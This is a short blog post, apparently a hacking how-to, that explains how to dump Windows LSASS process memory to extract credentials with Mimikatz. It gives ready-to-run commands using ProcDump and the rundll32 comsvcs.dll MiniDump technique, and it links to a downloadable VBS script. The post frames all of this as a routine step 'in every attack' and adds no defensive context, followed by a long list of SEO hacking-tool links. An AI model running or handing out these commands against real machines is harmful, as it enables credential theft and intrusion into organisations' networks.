In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.
Here are some of the important methods,
Using ProcDump :
1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"
Using VB Script :
Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp
rundll32 Command :
Essentially previous method VBS script is using following command for dumping Lsass.exe process
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full
So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.
Related articles
- What Is Hacking Tools
- Hacking Tools
- Hacker Tools Apk
- Github Hacking Tools
- Pentest Tools Github
- Best Hacking Tools 2020
- Hacking Tools 2020
- Pentest Tools For Mac
- Pentest Tools Online
- Pentest Tools Alternative
- Hacking Tools For Kali Linux
- Computer Hacker
- What Are Hacking Tools
- Hacker Tools Hardware
- Pentest Tools Port Scanner
- Best Pentesting Tools 2018
- Hackrf Tools
- Hacking Tools For Windows 7
- Pentest Tools Port Scanner
- Hacker Security Tools
- Nsa Hacker Tools
- Hacking Tools Mac
- Underground Hacker Sites
- Pentest Recon Tools
- Pentest Reporting Tools
- Hacking Tools Windows
- Pentest Tools For Windows
- Hacker Tools Free Download
- Hacking Tools And Software
No comments:
Post a Comment